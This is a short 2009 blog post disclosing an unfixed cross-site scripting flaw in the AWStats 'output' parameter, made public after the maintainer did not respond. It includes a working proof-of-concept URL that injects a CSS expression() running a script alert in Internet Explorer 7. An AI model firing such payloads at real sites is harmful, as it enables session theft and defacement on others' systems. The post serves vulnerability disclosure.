Monday, May 25, 2009

XSS in AWStats, no 0day, 2year!

I don't really like releasing information about security bugs this way. But I'd rather have people know about a bug in the software they use if it's not fixed. The information has been publicly available in the SourceForge tracker anyway.

AWStats contains a Cross Site Scripting vulnerability (XSS) in the output parameter:

http://[domain]/awstats/awstats.pl?config=[example.com]&framename=mainright&output="%20style="width:%20expression(alert('XSS'));"

This one doesn't work in FF, it does in IE7 though.

(I tried contacting the author in several ways, no response.)

No comments:

Post a Comment